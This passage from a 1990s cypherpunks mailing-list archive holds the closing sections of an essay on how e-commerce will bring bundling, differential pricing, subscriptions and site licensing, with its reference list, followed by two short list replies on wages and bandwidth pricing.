conflict between notions of economic efficiency and fairness.  

There are many examples in the marketplace of behavior that appears 
even less fair.  For example, in 1990, IBM introduced the LaserPrinter 
E, a lower cost version of its LaserPrinter.  The two version were
identical, except that the E version printed 5 pages per minute
instead of 10 for the regular one.  This was achieved (as was found by
independent testers, and was not advertised by IBM) through the
addition of additional chips to the E version that did nothing but
slow down processing.  Thus the E model cost more to produce, sold for
less, and was less useful.  However, as Deneckere and McAfee show in
their paper [DeneckereM], which contains many more examples of this
type (referred to as "damaged goods"), it can be better for all
classes of consumers to allow such behavior, however offensive it
might be to the general notions of fairness.  Consumers who do not
need to print much, and are not willing to pay for the more expensive
version, do obtain a laser printer.  Consumers who do need high
capacity obtain a lower price than they might otherwise have to pay
since the manufacturer's fixed costs are spread over more units.

Barriers in commerce are an essential part of the current marketplace.
Consider the book trade.  Although people do not think of it this way,
current practices involve charging different prices to different
users, and thus maximizing revenues.  A novel is typically published
in hard cover first, with the aim of extracting high prices from those
willing to pay more to read it right away.  Once that market is fully
exploited, a somewhat cheaper trade paperback edition is made
available, to collect revenue from those not willing to pay for the
hardbound copy.  Finally, a regular paperback edition is published at
an even lower price.  The used book market develops in parallel, for
those willing to read books marked up by previous owners, and so on.

How will ecommerce affect book publishing?  Eventually we can expect
that all books will be available electronically (and will evolve
towards new forms, made possible by digital communications).  Costs of
publishing will come down, and this is going to increase the supply,
and lead to many works distributed for free, by aspiring authors
hungry for the recognition that might lead to fortune.  What about
those electronic books that people will be willing to pay for?  With
publishing costs reduced, we can expect that the authors' share of the
revenues will rise, say from the current 15% or so royalty rate to 50%
or more, and so in effect the authors might become much more
influential than the publishers (or might become the publishers
themselves).  However, since publishers obviously benefit from the
present system of differential pricing, they (and the authors) are
likely to have an incentive to institute a similar system in the
digital arena.  The issue is how to do this.  Bits are bits, after
all, and are easy to copy.  If we make only simple extensions of
current copyright laws, we are likely to see a great change in the
marketplace for information goods.  For example, when I buy a book, I
cannot make a copy of it and sell that copy to somebody else.  On the
other hand, I can sell, rent, or give away the book I purchased to
anyone I wish.  Suppose we carry over exactly the same rights to the
digital world, with some combination of cryptographic techniques and
laws guaranteeing that unauthorized copies of digital "books" cannot
be made.  The ease of transactions on the Net (which is what leads to
the dreams of "frictionless capitalism") would then force major
changes.  With physical volumes, there are substantial barriers to
trade in books.  Most people do not like reading books that are
tattered or marked up by others.  They take their time reading books,
and (especially for the ones they enjoy) like to retain them in their
libraries to be reread any time they wish.  As a result of these
natural barriers, a single copy is usually read by only a few people.
The economics of the present book publishing business depend on this
phenomenon.  In the digital world, though, with high bandwidth
networks and efficient intermediaries, I could buy a copy of a book an
hour before bedtime, read a new chapter, and then, just before turning
off the lights, send that copy off for resale.  Instead of a million
copies of a printed book, a thousand electronic copies might suffice.
This would force a dramatic change in the structure of the book
publishing industry, and explains why there is an intense interest in
the creation of artificial barriers to ecommerce, either through
revisions to copyright laws or through technological methods.


3.  The bumps on the electronic highway

Some types of barriers to commerce are accepted as natural when
dealing with physical goods.  It would be prohibitively expensive for
the New York Times, say, to distribute 100 little sheets each day,
each one with a separate story, and having readers buy just the ones
they were interested in.  The accepted wisdom is that ecommerce will
lead to the electronic equivalent of just that, with readers selecting
and paying for individual stories.  It will certainly be possible to
do so, as micropayment systems are being developed that will allow for
processing of tiny transactions, such as payment for a single story in
the New York Times, or a "hit" on some aspiring poet's Web page that
contains his sonnets.  However, the economic argument is that while
such schemes might exist, and may be used in some situations, they
will not be dominant.  The example of book publishing in the previous
section shows why producers of information goods benefit from the
natural barriers that exist in the physical world.  Their incentives
to create artificial barriers in the digital world will be even
stronger.  It will be harder to distinguish between consumers, since
transactions will tend to be impersonal, and arbitrage will be easy.
Most important, distribution costs will be negligible, so that only
the "first copy" cost of creating a work will matter.  Hence
traditional, commodity-market type of competition, in which the market
price equals the marginal cost, will have to be avoided, since
marginal prices will be essentially zero.  The incentive that low
marginal costs provide to create barriers in commerce can already be
seen in many high technology fields.  The "damaged goods" studied in
[DeneckereM] come primarily from such areas.  The pharmaceutical
industry is notorious for selling products for hundreds of times more
than the cost of producing them, and for selling the same chemicals
for human use for ten times the price charged for veterinary purposes.

While the incentives to erect artificial barriers will be large in
ecommerce, there will also be novel possibilities created by the
electronic medium.  What kinds of barriers are we likely to encounter
in ecommerce?  The four most important ones will probably be bundling,
differential pricing, subscriptions, and site licensing.  Hal Varian
[Varian3] discusses the first two in detail, and argues convincingly
that they will be prominent in ecommerce.  In the rest of this section
I will present some additional arguments for these techniques, and
will also show why subscription services (which are a form of
bundling, but are important for other reasons as well) and site
licensing are also likely to be common.  There are additional
arguments in favor of subscription and site licensing plans.  For
example, security problems are likely to be easier in those cases.
However, this essay will deal only with the economic arguments.

The basic assumption in the economic analyses below is that for each
information good, an individual consumer will purchase it only if the
price is below some threshold (that consumer's valuation of the good).
For simplicity, I will only consider items that are independent of
each other (such as stories in a newspaper).  Much of the economic
literature cited below is concerned with goods that are related in one
way or another.  (For example, if I buy a spreadsheet from Corel, I am
unlikely to purchase another one from Microsoft.  On the other hand,
if I buy a presentation package, I am more likely to buy a CD-ROM of
pictures than I would otherwise.)  I will not take these factors into
consideration, to keep the presentation simple, and bring out only the
main factors that are likely to influence the development of
ecommerce.  I will also assume that producers cannot in general find
out what an individual is willing to pay for a product, but can,
through test marketing, say, obtain an accurate statistical
description of the valuations that the whole population of potential
buyers place on that product.


3.1 Bundling

Bundling consists of offering several goods together in a single
package, such as combining a word processor, a spreadsheet, and a
presentation program in a software suite (such as Microsoft Office),
or else printing many stories in a single newspaper.  Bundling is
common, and often seems natural.  For example, right shoes and left
shoes are invariably sold together, and just about the only time
anyone might regret this is when a dog chews up one of a new pair of
shoes.  I will concentrate on bundling of goods that are almost
unrelated, such as a word processor and a spreadsheet program.  Why
should the pair of them together sell for much less than the sum of
their separate prices?  It is useful to have seamless integration of
the two, to make it easier to move material between them, to have
common command structure and icon layouts, and so on.  That seems to
argue for charging more for the bundle than for the pieces!  However,
bundling, with a lower price for the bundle than for the components,
or even without any possibility for purchasing the components
separately, is extremely common.  The reason is that it allows the
producer to increase revenues by capturing more of the "consumer
surplus" that arises when customers pay less than they are willing to
do.  Since in general prices have to be the same for all customers,
bundling can be used to smooth out the uneven preferences people have
for different goods and services.  For example, suppose we were
dealing with a proposal to start a newspaper that would have two
sections, a business page and a sports page.  Suppose also that there
were just two potential readers, Alice and Bob. Suppose also that
Alice needs to keep up with the business world, and so is willing to
pay $0.50 for the business page, but only $0.20 for the sports page,
since she does not particularly care about sports, but might like to
keep up with lunchtime conversations.  Suppose that Bob's preferences
are reversed, in that he is an eager sports fan, willing to pay $0.50
for the sports page, but only $0.20 for the business page, since all
he cares about is occasionally checking on his retirement fund.  Under
those conditions, how should the proposed newspaper be priced?  If
each section is sold separately, then a price of $0.20 for each will
induce both Alice and Bob to buy both sections, for total revenues of
$0.80.  If the price is set at $0.50 for each section, then Alice will
buy only the business page, and Bob only the sports page, for total
revenue of $1.00.  On the other hand, if the two sections are bundled
together, then a price for both of $0.70 will induce both Alice and
Bob to purchase the newspaper, and will produce total revenues of
$1.40.  Thus the economically rational step is not to offer the two
sections separately, but only bundled together.

Bundling has been studied extensively in the literature, starting with
the paper of Burnstein [Burnstein].  Other references are [AdamsY,
Bowman, Economides1, KrishnaKA, Schmalensee, Stigler, Varian2,
Wilson1, Wilson2].  Unfortunately there is no simple prescription that
can be given as to when bundling is better than selling items
separately.  Depending on the distribution of consumer preferences,
bundling can be either more or less profitable for the producer, as
was already shown by Adams and Yellen [AdamsY].  However, there are
some general guidelines.  One is that bundling becomes more profitable
as marginal costs decrease (which may be part of the reason for the
spread of software suites as the amount of unpaid support provided to
users by software houses decreased).  Another is that bundling becomes
more attractive when consumer preferences are negatively correlated
(as in the example above, where Alice and Bob had almost opposite
tastes).  However, negative correlation in valuations is not necessary
for bundling to be profitable, as was first pointed out by Schmalensee
[Schmalensee], and as will be shown in the example below.  Random
variations in preferences are sufficient as a result of the law of
large numbers.

How much of a difference can bundling make to a producer's bottom
line?  Unfortunately the published literature is practically silent on
this point, for reasons I will discuss later.  (There is an intriguing
computation in [Stigler], based on reported revenues of movie theaters
in different cities.)  Let us therefore consider some artificial
examples, a bit more realistic than the Alice and Bob one presented
above.  Consider two books, A and B, say "The Tannu-Tuva Cookbook" and
"Sherlock Holmes in Antarctica."  Suppose that among one million
potential customers, book A is valued at $1 by 100,000, at $2 by
another 100,000, and so on, up to $10 by 100,000, and suppose the same
distribution of valuations applies to book B. Suppose further that the
valuations of the two books are independent.  Thus there are about
10,000 customers who value book A at $3 and simultaneously book B at
$5, and similarly about 10,000 customers who place values $9 and $2 on
A and B, respectively.  Under these conditions, if the publisher is to
sell these books separately, revenue will be maximized when the price
of each is set at $5.  About 600,000 people will purchase each book,
for total revenue from sales of both books of $6,000,000.  (This
maximum is not unique, as the same revenue can be achieved by pricing
each book at $6, in which case about 500,000 people will buy each.)
However, if the two books are sold together, revenue can be made much
higher.  Since there are 10,000 people who value the bundle at $2
(exactly the 10,000 who value each book at $1), while there are 90,000
who value it at $10, a short calculation shows that the
revenue-maximizing price is $9.  At the price of $9 per bundle,
720,000 people will purchase it, for total revenue of $6,480,000,
exactly 8% higher than if the books were sold separately.  Since
profits would be the revenues minus the fixed costs of producing the
books, they would increase much more dramatically.

What weakens the case for bundling is that most people have no
interest in most goods.  In the example of the books "Sherlock Holmes
in Antarctica" and "The Tannu-Tuva Cookbook," a more realistic
assessment might be that in a population of 1,000,000, each book would
be valued at zero by 90% of the population, with 10,000 valuing it at
$1, 10,000 at $2, and so on.  If the 100,000 people who do place a
positive value on book A are distributed independently of those who
value book B at $1 or more, then there would be only 10,000 people who
place positive values on both A and B. Bundling under these conditions
would not produce much benefit.  However, even in cases of extreme
indifference, bundling can work if there are enough goods.  Consider
an information service with 1,000 items (news stories, pictures, or
songs).  Suppose that in a large population, each individual is
totally uninterested in 900 of the items, and values 10 at $0.01 each,
10 at $0.02 each, and so on, with 10 valued at $0.10 each.  If the
items are to be sold individually, the revenue-maximizing price will
be $0.05 for each (or $0.06 each), and each customer will purchase 60
items for a total of $3.00.  However, if the collection is sold as a
whole (which involves no extra cost to producers of information goods,
and also no cost of tossing out mounds of unwanted boxes to
consumers), then a price of $5.50 will induce each person to buy, for
a gain of 83% in revenues (and much more in profits).

So far we have compared only sales of unbundled products (pure
unbundling) to those of bundles (pure bundling).  However, it is often
advantageous to use mixed bundling, where both bundles and separate
goods are offered.  In the example of the books "Sherlock Holmes in
Antarctica" and "The Tannu-Tuva Cookbook," with the distribution of
valuations assumed above, a price of $10 for the bundle and $5 for
each book separately would produce revenue of $7,400,000, about 14%
higher than pure bundling, and over 23% higher than pricing the books
separately.  (Note that the optimal combination above has the
paradoxical property that the price of the bundle is exactly the price
of the pieces.  Under the assumption of the model, people who value
book A at $7 and book B at $3 will purchase the bundle, but if the
bundle is not available, will only purchase A.) Adams and Yellen
[AdamsY] have shown that mixed bundling is always more advantageous to
the producer than pure bundling.

Toy models like the one above are amusing to play with, and help
illustrate the advantages to producers of bundling.  If the
distribution of consumer valuations is known, one can determine
numerically what the optimal policy is for the producer [Wilson1,
Wilson2].  Unfortunately the basic assumption that consumers know what
value they place on various goods, and purchase them precisely when
the price is below their value, is questionable.  In practice people
behave in much more complicated ways.  An old joke illustrates this:

  Waiter:  And for dessert, we have chocolate mousse, apple pie,
    and ice cream.

  Customer:  I will have apple pie.

  Waiter:  Oh, I forgot to mention that we also have Peach Melba.

  Customer:  In that case I will have the mousse.

While this is a joke, actual behavior is often just as paradoxical.
Catalog merchants have learned that the attractiveness of an item is
affected strongly not just by its price and description, but also by
its placement among other offers.  Consumer choices are complicated.
Some of the seemingly irrational behavior can be explained on the
basis of different consumers having different sensitivities to prices.
For example, the phenomenon of regular sales has been modeled
successfully this way in [Varian1] and later papers.  Other
interesting phenomena emerge if one assumes that consumers do respond
to price signals in an economically rational way, but with some delay
(see [RichardsonR], for example).  However, there is no complete
theory.  Experimental economics has shown that economically optimal
solutions can be attained even with small groups of agents, provided
they are working in a constrained environment and are trying to
optimize their wealth, although even there paradoxes abound (cf.
[CookL, HagelR]).  In general settings, though, human behavior is hard
to model.  There are nontransitivities in preferences, choices are
determined by behavior of others (so a person is more likely to see a
movie that colleagues have seen to have something to talk to them
about), and so on.  Companies collect extensive data from test
marketing, but that data is noisy, and typically involves only small
variations in test parameters.  There seems to be no unambiguous
empirical demonstration that a well defined demand curve exists.  Thus
economic models discussed above do indicate that bundling is likely to
be advantageous to producers, but do not prove this.

What happens in the real marketplace, with a variety of customers and
competitors, and where there is already much experience with a variety
of marketing plans?  What we see there is extensive evidence of
bundling.  In many situations, such as that of physical newspapers,
there is an obvious motivation for bundling to reduce costs.  However,
there is also evidence of bundling's success when there are
practically no physical costs involved.  Software suites such as
Microsoft Office are just one example.  Cable TV does not charge for
each channel separately, but for packages (bundles) of them.  Finally,
the big and profitable online information services in the financial
and legal arena, such as Reuters, Bloomberg, and Lexis, all operate on
a subscription basis or appear to be moving in that direction.  (The
"pay-per-view" approach made more sense when the computing
infrastructure for online access was expensive, and therefore there
were high marginal costs of providing access.)  All this evidence
confirms that bundling is likely to be common in ecommerce.


3.2 Differential pricing

Charging different prices to different consumers is already common.
Various senior citizen or student discount programs are just some of
the most widely spread practices.  Scholarly journals typically charge
much higher prices to libraries than to individuals, sometimes 10
times higher.  For a thorough discussion of such price discrimination
and its economic and legal status, see the survey [Varian2].  A
producer would like to charge according to the consumer's willingness
to pay, but the consumer will usually be reluctant to reveal such
information.  However, it is sometimes possible to correlate
willingness to pay with other features.  Airlines offer much cheaper
tickets for those willing to be away from home on Saturday night.  The
theory is that business travelers, who are willing to pay a lot, will
not be willing to put up with such inconvenience.  In information
services, online services such as Prodigy and CompuServe offer stock
market quotes that are delayed by 15 or 20 minutes for no extra cost,
beyond the basic subscription.  Real-time quotes uniformly cost extra,
on the theory that those who need them for their trading will pay
more.  The software industry relies on differential pricing in many
products.  Student or demo versions typically are the same as the main
product, except for artificial limitations on what they can do.  They
either cannot produce large executables, or cannot handle large files,
or cannot use extended precision.  We are likely to see many more
examples of such differential pricing.  Electronic publications may
offer high-resolution versions at one price, a lower-resolution
version at a lower one, and sometimes they might offer a fax-quality
version at no charge.  There are already interesting experiments going
on in book distribution, with authors making some parts of their
manuscripts freely available on the Internet, to advertise their work,
to update it with lists of current errata, and to make available
features that draw on the unique capabilities of the electronic
medium.  There are also likely to be differentials based on
timeliness, as with stock market quotes; old issues might be offered
at low or no charge.  There might be extra charges for links to cited
works or other desirable features.

Differences in quality of offered products might be the only way to
preserve some of the features of public libraries.  In the digital
realm, without some artificial barriers, there would be practically no
difference between buying and borrowing.  Hence the traditional
library policy of unrestricted lending is not compatible with
ecommerce, and we are likely to see artificial barriers.  Databases
might be available to library customers but only inside the library,
at special terminals, for example.  Librarians would then have to
become gatekeepers, restricting access to material more than making it
freely available.


3.3 Subscription vs.  pay-per-view

Offering access to a database or a movie channel on a subscription
basis is a form a bundling.  The alternative is to charge for each
movie, or each download of a Web page.  There is much discussion of
how such "a la carte" shopping might become prevalent.  One attraction
of programs consisting of small applets that can be downloaded on
demand appears to be the perception that this would allow producers to
charge according to how frequently the software is used.  However,
past experience with pay-per-view systems has been discouraging.
Except for a few events, such as championship boxing matches, they
have not succeeded in attracting much revenue.  All the arguments in
favor of bundling apply, and suggest that pay-per-view systems will
not be common.  Furthermore, there are additional arguments, supported
by empirical data on consumer behavior, that argue against
pay-per-view schemes.  Consumers appear to have a strong predilection
for reducing risk, even when this predilection results in lower than
optimal expected financial payoff.  A certain $10 gain is usually
preferred to a wager with a 90% chance of winning $15, and a 10%
chance of losing $20.  People also tend to use small deductibles when
purchasing fire or casualty insurance, even when they could easily
bear the loss from a larger deductible.  (Since few insurance
companies operate with an overhead of less than 30%, a larger
deductible would almost surely lead to savings in the long run.)
Similarly, consumers appear to have a strong preference for
subscription services.  To a large extent this is probably explainable
by general risk aversion.  I may prefer to pay a higher price for a
word processor now, even if I do not need it much, to have free use of
it when I lose my job, and need to send out lots of job applications,
but will not be able to afford extra charges.  This preference for
subscription services is present even among librarians, who are not
spending their own money, and with a large number of users of their
resources might be expected to have a stable usage pattern.  Even so,
they have often expressed their unease about paying "a la carte" for
access to databases, since they feared they could not predict what
this would do to their budgets.  It is difficult to quantify the
strength of this preference for subscription services, but it exists
and is strong.  In the 1970s, the Bell System first experimented with
charging for local calls.  Typically, customers were given a choice of
the traditional flat rate option, which might cost $7.50 per
month, and allow unlimited local calling, and of a measured rate 
option, which might cost $5.00 per month, allow for 50 calls at no
extra charge, and then cost $0.05 per call.  Anyone making fewer than
100 local calls per month would be better off with the measured rate
option.  However, in the numerous trials that were carried out, typically
around 50% of the customers who were making almost no local calls at
all, and thus would benefit from measured rate service, still stayed with 
the more expensive flat rate service.  The preference for flat rate 
pricing for Internet access is another example of this phenomenon.

The main conclusion to be drawn from this discussion is that
subscription services do offer substantial value to consumers, even if
that value may seem to be irrational.  As a corollary, they also offer
value to producers.  People are willing to pay a lot just to be able
to occasionally use certain features.  Software producers complain
about all the heavy users of their products who do not pay for their
high usage.  However, these producers benefit from the many users who
hardly ever use their system.  I seldom use Microsoft Word, but when I
do use it (typically because somebody sends me a Word document), I do
need it, and so am willing to purchase it for just such occasions.
Hence we can expect that even if large systems consisting of
downloadable applets do become practical, they will be available on a
subscription, and not on a per-use basis.


3.4 Site licensing

Site licensing, in which a company or a university pays a flat fee to
allow everyone in that institution to use some program or access a
database, is very common in the computer and online information
industries.  In some forms, it has been present for a long time in
other areas as well.  For example, scholarly publishing can be thought
of as an example of site licensing.  Typically a university will buy a
single copy of an esoteric journal, which is then placed in a library,
to be consulted by anyone on campus.

In software, site licensing has many attractive features.  It
simplifies the enforcement problem (which is nontrivial, since many
corporations report they spend more on policing software use than on
the purchase of that software).  It also encourages new users to try
out a package, and thus stimulates more usage.  In addition, though,
site licensing has a strong direct economic argument behind it.  We
can think of site licensing as a variant of bundling.  In ordinary
bundling, a producer assembles together several goods into a bundle,
to smooth out the differences in valuations that individual consumers
place on those goods.  In site licensing, a producer assembles
together a group of consumers to smooth out the differences in
valuations that different people place on a single product.  As an
example, suppose that in a company of 1,000 employees, 900 are totally
uninterested in a software package, but 10 feel it is worth paying $10
for it, 10 feel it is worth $20, and so on, up to 10 who feel it is
worth $100.  If the software manufacturer had to sell copies of the
package to individuals, the best price would be either $50 or $60 for
a copy, and the revenue in either case would be $3,000.  However, if
the management of the company has an accurate impression of how much
the employees value the product, it should be willing to pay $5,500
for a site license.  This would be a much better deal for the
producer, even though it would bring in only $5.50 for each person
entitled to use the product.  Hence we can expect further spread
of site licensing.


4.  Fairness, legality, and efficiency

Economic arguments show that there is value to many of the artificial
barriers in commerce.  It is value not just to producers of the goods
and services, but to society.  Moreover, the incentives to create such
barriers apply to individuals as well as large corporations.  If Alice
plays the piano, and Bob performs magic tricks, they might be able to
obtain higher income by bundling their services through offering a
combined act to nightclubs.  The result might be the difference
between starvation and relative comfort.  In ecommerce, a group of
budding poets might collect larger revenues if they sell access to
their combined works, instead of working individually.

While economics will lead to the creation of barriers in ecommerce,
this will frequently clash with popular notions of what is fair.
There is already much grumbling about airline pricing and senior
citizen discounts.  Moreover, many of the grumbles result in laws
restricting commerce.  Several cities in the United States have passed
laws decreeing that women's shirts should not cost more to launder
than men's.  There is a general perception of what is fair, often
codified into laws.  Some of it goes back to the ancient notion of a
"just price," which is supposed to reflect a modest markup over the
producer's costs.  However, in ecommerce, even more than in the modern
physical economy, cost is a poorly defined concept.

In ecommerce, the concepts of "increasing returns" [Arthur], in which
producer profits increase as usage increases, and customer lock-in, in
which someone trained in using a particular spreadsheet faces a major
barrier of retraining in switching to another one, are the ruling
ones.  This means that the standard tests of illegal monopolistic
behavior do not apply.  It can make excellent sense to give away a
software package, since the major benefit to the producer will come
from sales of upgrades.  Other examples of economically sensible
behavior that is not accepted by society exist.  U. S. courts stopped
IBM from requiring users of its tabulating machines to purchase their
punched cards from IBM [US1936].  Today, most economists would argue
that this decision was a mistake, since in effect what IBM was
attempting to do was to charge the heavy users more than the light
ones, to enlarge the market.  (See [Stigler] for economic arguments
against another decision, [US1962], which barred movie distributors
from requiring movie theaters to book whole series of movies instead
of selecting them individually.)  While the general issue of what
practices are legal is not entirely clear (cf.  [Bowman, Varian2]),
there may be legal problems with some of the barriers that are likely
to be erected.  Even when there is no legal difficulty, there can be
extensive public action, as in recent protests against pharmaceutical
firms' pricing, and against use of child labor in less developed
countries.  (With reputations, whether of celebrity endorsers or
producers themselves, becoming increasingly important, public protests
can be powerful weapons.)  Issues of fairness (see [Zajac] for
extensive discussions of their influence on public policy) are likely
to be much more pronounced than in the past.  One reason is that the
barriers on the electronic superhighway are likely to be frequent.
Another is that those barriers will be much more visible as
artificial.  (In print book publishing, most people seem to think that
hardcover books sell for more than paperbacks because they cost more
to produce.  However, the differences in costs are minor, and the
price difference is just a form of price discrimination.  On the Web,
it will be clear that a low resolution version of a work is just a
degraded version of the high resolution one.)  It will also be much
easier to organize protest movements than in the past.

Public perceptions of what is fair depend on culture, are often
inconsistent, and do often clash with economic incentives.
Furthermore, the rapid evolution of technology, markets, and laws,
will lead to a continuation of the unstable situation we have.
Therefore there will likely be increasing temptation to ask
governments to intervene, and that will produce serious difficulties
for ecommerce.  Barlow's "independence declaration" [Barlow] might
appeal to many, but is totally unrealistic.  Government has been
involved in setting up the Internet, and is getting more involved all
the time, through issues such as the fair use of Scientology documents
on the Net, assignments of names, and provision of wide access to the
Net. The U. S. Telecommunications Act of 1996, which nominally
deregulated telecommunications, also brought in extremely intrusive
government regulations, to deal with thorny issues of setting up a
"level playing field."  We should be prepared for more intervention of
this type, whether they are successful or not.

Many issues will be complex.  As an example, only a tiny fraction of
the public understood any of the arguments about the U. S.
telecommunications deregulation debate, with its technical points
about access to local wires.  Also, few people follow the details of
the debate about revisions to copyright laws.  As was argued in an
earlier section, ecommerce requires some revision.  However, there are
a variety of ways to do this, and the precise ways in which different
proposals affect different players is not clear to the public.  (See
the discussions by Samuelson [Samuelson1, Samuelson2] of the proposed
revisions to U. S. copyright law [USPTO1995], as well as the survey
paper [Okerson] and the book [PattersonL].)  Therefore we can expect
an increased demand for lobbyists, lawyers, and public relations
experts.  Even in the non-governmental arena, it is reported, for
example, that "in preparing a commemorative CD-ROM for the 500th
anniversary of the first Columbus voyage to America, IBM spent over
$1M clearing rights, of which only about $10K went to the rights
holders; everything else went into administrative and legal fees"
[Lesk].  Although systems are being developed for automatic tracking
of rights to copyrighted material and the automatic payment of fees,
it is unlikely that such systems will see wide usage.  Content
owners will probably be reluctant to rely on them, and possibly
let valuable rights slip away.  

The conclusion to be drawn from this essay is that electronic
commerce will increase the efficiency of the economy.  However, it 
will also create artificial barriers, and we will have to learn
to live with them.



Acknowledgements:  I thank Greg Blonger, Hsueh-Ling Huynh, Bill
Infosino, Steve Lanning, Peter Linhart, Gerry Ramage, Ryan Siders, Hal
Varian, and Ed Zajac for their comments and the information they
provided.



References:

[AdamsY] W. J. Adams and J. L. Yellen, Commodity bundling and the
  burden of monopoly, Quart.  J. Economics, 90 (1976), 475-498.

[Arthur] W. B. Arthur, "Increasing Returns and Path Dependence
  in the Economy," U. Michigan Press, 1994.

[Barlow] J. P. Barlow, A cyberspace independence declaration,
  Feb.  9, 1996 email broadcast message, available at URL
   http://syninfo.com/IAN/02136002.htm
  and many other Net sites.

[Bowman] W. S. Bowman, Jr., Tying arrangements and the leverage
  problem, Yale Law J., 67 (Nov.  1967), 19-36.

[Burnstein] M. L. Burnstein, The economics of tie-in sales,
  Rev.  Economics and Statistics, 42 (1960), 68-73.

[CookL] K. S. Cook and M. Levi, eds., "The Limits of Rationality,"
  Univ.  Chicago Press, 1990.

[DeneckereM] R. J. Deneckere and R. P. McAfee, Damaged goods,
  J.  Economics and Management Strategy, to appear.

[Dyson] E. Dyson, Intellectual value, first published in Dec. 1994
  in Release 1.0, republished (in an abbreviated form) in Wired,
  July 1995, and available at URL
   http://www.hotwired.com/wired/3.07/features/dyson.html

[Economides1] N. Economides, Mixed bundling in duopoly, working
  paper (1993), available at URL
   http://edgar.stern.nyu.edu/networks/cvnoref.html

[Economides2] N. Economides, The economics of networks, Intern.
  J.  Industrial Organization, to appear.  Available at URL
   http://edgar.stern.nyu.edu/networks/cvnoref.html

[FrankC] R. H. Frank and P. J. Cook, "The Winner-Take-All Society,"
  Free Press, 1995.

[Gates] B. Gates (with N. Myhrvold and P. Rinearson), "The Road
  Ahead," Viking, 1995.

[HagelR] J. H. Hagel and A. E. Roth, eds., " The Handbook of
  Experimental Economics," Princeton Univ.  Press, 1995.

[KrishnaKA] A. Krishna, P. K. Kopalle, and J. L. Assuncao,
  Bundling of complementary goods:  The impact of competition,
  brand preference, and price sensitivity, in preparation.

[Lesk] M. Lesk, The seven ages of information retrieval, to be
  published.

[Odlyzko] A. M. Odlyzko, On the road to electronic publishing,
  Euromath Bulletin, vol.  2, no.  1 (June 1996), to appear, and
  to be available at URL
     http://www.math.ethz.ch/~shared/emb
  Available electronically at URL
     http://netlib.att.com/netlib/att/math/odlyzko/index.html
  and via email by sending the message
     send epublishing.road.txt from att/math/odlyzko
  to netlib@research.att.com.

[Okerson] A. S. Okerson, Who owns digital works?, Scientific American,
  275 (July 1996), 64-68.  Text available electronically at URL
     http://www.sciam.com/WEB/0796issue/0796okerson.html

[PattersonL] L. R. Patterson and S. W. Lindberg, "The Nature of
  Copyright: A Law of Users' Rights," Univ.  Georgia Press, 1991.

[RichardsonR] T. J. Richardson and R. Radner, Monopolists and
  viscous demand, to be published.

[Samuelson1] P. Samuelson, Intellectual property rights and the global
  information economy, Comm.  ACM 39 (1996), 23-28.

[Samuelson2] P. Samuelson, Technological protection for copyrighted
  works, Emory Law J., to appear.

[Schmalensee] R. Schmalensee, Pricing of product bundles,
  J.  Business, 57 (1982), S211-S230.  Comments on pp.  S231-S246.

[Stigler] G. Stigler, United States v.  Loew's Inc.:  A note on
  block booking, Supreme Court Review, 152 (1963), 152-157.

[US1936] International Business Machines Corp.  v.  United States,
  298 U.S. 131 (1936).

[US1962] Loew's Inc. v.  United States, 371 U.S. 38, 52 (1962).

[USPTO1995] Intellectual Property and the National Information
  Infrastructure, The Report of the Working Group on Intellectual
  Property Rights, B. A. Lehman, Chair, U. S. Patent and Trademark
  Office, Sept.  1995.  Available at URL
    http://www.uspto.gov/web/ipnii/

[Varian1] H. R. Varian, A model of sales, Am. Economic Review,
  70 (1980), 651-659.  Erratum on p.  517 of vol.  71 (1981).

[Varian2] H. R. Varian, Price discrimination, pp.  597-654 in
  "Handbook of Industrial Organization," vol.  I, R. Schmalensee
  and R. D. Willing, eds., Elsevier, 1989.

[Varian3] H. R. Varian, Pricing information goods, available at URL
  http://www.sims.berkeley.edu/~hal/people/hal/papers.html.

[Varian4] H. R. Varian, Buying, renting and sharing information goods,
  available at URL
  http://www.sims.berkeley.edu/~hal/people/hal/papers.html.

[Wilson1] R. Wilson, "Nonlinear Pricing," Oxford Univ.  Press, 1993.

[Wilson2] R. Wilson, Nonlinear pricing and mechanism design,
  pp.  249-289 in "Handbook of Computational Economics," vol.  I,
  H.  M. Amman, D. A. Kendrick, and J. Rust, eds., Elsevier, 1996.

[Zajac] E. E. Zajac, "Political Economy of Fairness," MIT Press,
  1995.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 12 Aug 1996 17:11:44 +0800
To: bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <199608120538.WAA29670@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 8/11/96 -0400, Perry E. Metzger wrote:
> Clearly, wages are defined by supply and demand -- not by "capital
> investment".

However more capital, relative to labor, influences demand, and more
labor, relative to capital, influences supply.

But in practice, the mobility of capital and the importance of labor
is such that this has little effect.  How much capital do you need
to provide a job for a software engineer?  The major determinant of 
someones value on the international market is who has coercive power 
over him, not the national supply of capital. Capital does not
come from nations, but from individuals.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 12 Aug 1996 17:22:59 +0800
To: Rabid Wombat <jya@pipeline.com>
Subject: Re: (Off Topic) Re: FCC_ups
Message-ID: <199608120538.WAA29683@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:34 AM 8/12/96 -0400, Rabid Wombat wrote:
> Anyone that wants to carry a large volume of traffic via the 'net will
> find that either the market will dictate that they pay for the bandwidth
> they use, or the FCC will. I don't see the FCC getting involved, unless
> the "phone service via internet" providor tries to use the courts to get
> out of paying for the bandwidth they use. 

Bandwidth costs almost nothing, unless you are doing full motion
video.

What is expensive is cutting that bandwidth up into little pieces 
and delivering those pieces to the people who want to use it at
the time that they want to use it.

Thus those who retail bandwidth will have the bulk of the revenue,
rather than those who wholesale it.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 12 Aug 1996 14:03:52 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 11 Aug 1996
